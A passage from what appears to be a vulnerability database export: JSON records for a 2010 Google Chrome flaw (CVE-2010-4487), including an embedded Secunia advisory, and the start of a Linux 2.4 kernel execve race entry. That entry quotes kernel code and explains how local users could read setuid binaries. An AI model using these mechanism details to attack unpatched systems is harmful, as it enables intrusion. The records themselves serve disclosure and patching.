        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.3"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.214"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.213"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.212"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.211"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.210"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.209"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.208"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.207"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.206"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.205"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.204"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.203"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.202"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.201"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.200"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.551.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.551.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.550.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.549.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.41"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "chrome",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.215"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "45170"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-4487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "8.0.552.215",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-4487"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Google Chrome Security Team, Nirankush Panchbhai, Microsoft Vulnerability Research (MSVR), Inferno, Cezary Tomczak, Stefan Troger, Billy Rios, Mohammed Bouhlel, Chris Evans, miaubiz, kuzzcc, Slawomir Blazek, Yang Dingning from NCNIPC",
    "sources": [
      {
        "db": "BID",
        "id": "45170"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2010-4487",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2010-4487",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-47092",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2010-4487",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201012-083",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-47092",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-47092"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-4487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Incomplete blacklist vulnerability in Google Chrome before 8.0.552.215 on Linux and Mac OS X allows remote attackers to have an unspecified impact via a \"dangerous file.\". Google Chrome is prone to multiple vulnerabilities. \nAttackers can exploit these issues to execute arbitrary code in the  context of the browser, cause denial-of-service conditions, gain access  to sensitive information, and bypass intended security restrictions;  other attacks are also possible. \nVersions prior to Chrome 8.0.552.215 are vulnerable. Google Chrome is a web browser developed by Google (Google). Remote attackers can use \\\"dangerous files\\\" to cause unknown effects. ----------------------------------------------------------------------\n\n\nSecure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). \n\nRequest a free trial: \nhttp://secunia.com/products/corporate/vim/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nGoogle Chrome Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA42472\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/42472/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=42472\n\nRELEASE DATE:\n2010-12-04\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/42472/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/42472/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=42472\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities and weaknesses have been reported in Google\nChrome, where some have an unknown impact and other can potentially\nbe exploited by malicious people to compromise a vulnerable system. \n\n1) An unspecified error exists, which can lead to cross-origin video\ntheft with canvas. \n\n2) An unspecified error can be exploited to cause a crash with HTML5\ndatabases. \n\n3) An unspecified error can be exploited to cause excessive file\ndialogs, potentially leading to a crash. \n\n4) A use-after-free error in the history handling can be exploited to\ncorrupt memory. \n\n5) An unspecified error related to HTTP proxy authentication can be\nexploited to cause a crash. \n\n6) An unspecified error in WebM video support can be exploited to\ntrigger an out-of-bounds read. \n\n7) An error related to incorrect indexing with malformed video data\ncan be exploited to cause a crash. \n\n8) An unspecified error in the handling of privileged extensions can\nbe exploited to corrupt memory. \n\n9) An use-after-free error in the handling of SVG animations can be\nexploited to corrupt memory. \n\n10) A use-after-free error in the mouse dragging event handling can\nbe exploited to corrupt memory. \n\n11) A double-free error in the XPath handling can be exploited to\ncorrupt memory. \n\nSOLUTION:\nFixed in version 8.0.552.215. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits:\n1) Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR)\n2) Google Chrome Security Team (Inferno)\n3) Cezary Tomczak (gosu.pl)\n4) Stefan Troger\n5) Mohammed Bouhlel\n6) Google Chrome Security Team (Chris Evans)\n7) miaubiz\n8, 10) kuzzcc\n9) S\u0026#322;awomir B\u0026#322;a\u0026#380;ek\n11) Yang Dingning from NCNIPC, Graduate University of Chinese Academy\nof Sciences\n\nORIGINAL ADVISORY:\nhttp://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-4487"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "db": "BID",
        "id": "45170"
      },
      {
        "db": "VULHUB",
        "id": "VHN-47092"
      },
      {
        "db": "PACKETSTORM",
        "id": "96384"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-4487",
        "trust": 2.8
      },
      {
        "db": "SECUNIA",
        "id": "42472",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201012-083",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "45170",
        "trust": 0.3
      },
      {
        "db": "VULHUB",
        "id": "VHN-47092",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "96384",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-47092"
      },
      {
        "db": "BID",
        "id": "45170"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "db": "PACKETSTORM",
        "id": "96384"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-4487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ]
  },
  "id": "VAR-201012-0280",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-47092"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:19:28.430000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Apple OS X",
        "trust": 0.8,
        "url": "http://www.apple.com/macosx/"
      },
      {
        "title": "Beta Channel Update",
        "trust": 0.8,
        "url": "http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates.html"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "chrome_v8.0.522.215",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=35900"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-4487"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates.html"
      },
      {
        "trust": 1.7,
        "url": "http://code.google.com/p/chromium/issues/detail?id=59817"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a13423"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/42472"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4487"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-4487"
      },
      {
        "trust": 0.3,
        "url": "http://www.google.com/chrome"
      },
      {
        "trust": 0.3,
        "url": "http://www.xmlsoft.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www.microsoft.com/technet/security/advisory/msvr11-002.mspx"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/products/corporate/evm/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/products/corporate/vim/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/42472/"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=42472"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/42472/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-47092"
      },
      {
        "db": "BID",
        "id": "45170"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "db": "PACKETSTORM",
        "id": "96384"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-4487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-47092"
      },
      {
        "db": "BID",
        "id": "45170"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "db": "PACKETSTORM",
        "id": "96384"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-4487"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-12-07T00:00:00",
        "db": "VULHUB",
        "id": "VHN-47092"
      },
      {
        "date": "2010-12-02T00:00:00",
        "db": "BID",
        "id": "45170"
      },
      {
        "date": "2012-03-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "date": "2010-12-04T05:20:18",
        "db": "PACKETSTORM",
        "id": "96384"
      },
      {
        "date": "2010-12-07T21:00:09.187000",
        "db": "NVD",
        "id": "CVE-2010-4487"
      },
      {
        "date": "2010-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-07-28T00:00:00",
        "db": "VULHUB",
        "id": "VHN-47092"
      },
      {
        "date": "2015-05-07T17:10:00",
        "db": "BID",
        "id": "45170"
      },
      {
        "date": "2012-03-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      },
      {
        "date": "2021-09-08T17:19:30.917000",
        "db": "NVD",
        "id": "CVE-2010-4487"
      },
      {
        "date": "2020-07-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Google Chrome Vulnerabilities associated with incomplete blacklists \\",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003475"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201012-083"
      }
    ],
    "trust": 0.6
  }
}

var-200308-0094
Vulnerability from variot

A race condition in the way env_start and env_end pointers are initialized in the execve system call and used in fs/proc/base.c on Linux 2.4 allows local users to cause a denial of service (crash). ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Therefore, it cannot be read originally setuid It is possible to create an executable file with a bit assigned as a new executable file by changing the owner. As a result, local attackers who exploit this issue cannot read it setuid It is possible to read an executable file with a bit attached. At this time, it has been reported that this issue could potentially be used to execute arbitrary code with elevated privileges.Please refer to the “Overview” for the impact of this vulnerability. The problem lies in the atomicity of placing a target executables file descriptor within the current process descriptor and executing the file. Linux is an open source operating system. The execve() function has the following code (fs/binfmt_elf.c): static int load_elf_binary(struct linux_binprm * bprm, struct pt_regs * regs) { struct file interpreter = NULL; / to shut gcc up / [...] retval = kernel_read(bprm->file, elf_ex.e_phoff, (char ) elf_phdata, size); if (retval < 0) goto out_free_ph; retval = get_unused_fd(); if (retval < 0) goto out_free_ph; get_file(bprm- >file); fd_install(elf_exec_fileno = retval, bprm->file); When executing a new binary program, put the open executable file descriptor into the file table of the current process (current execve() caller), and execute . This allows an attacker to read the contents of the suid program (even if the attacker does not have permission to read)

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200308-0094",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
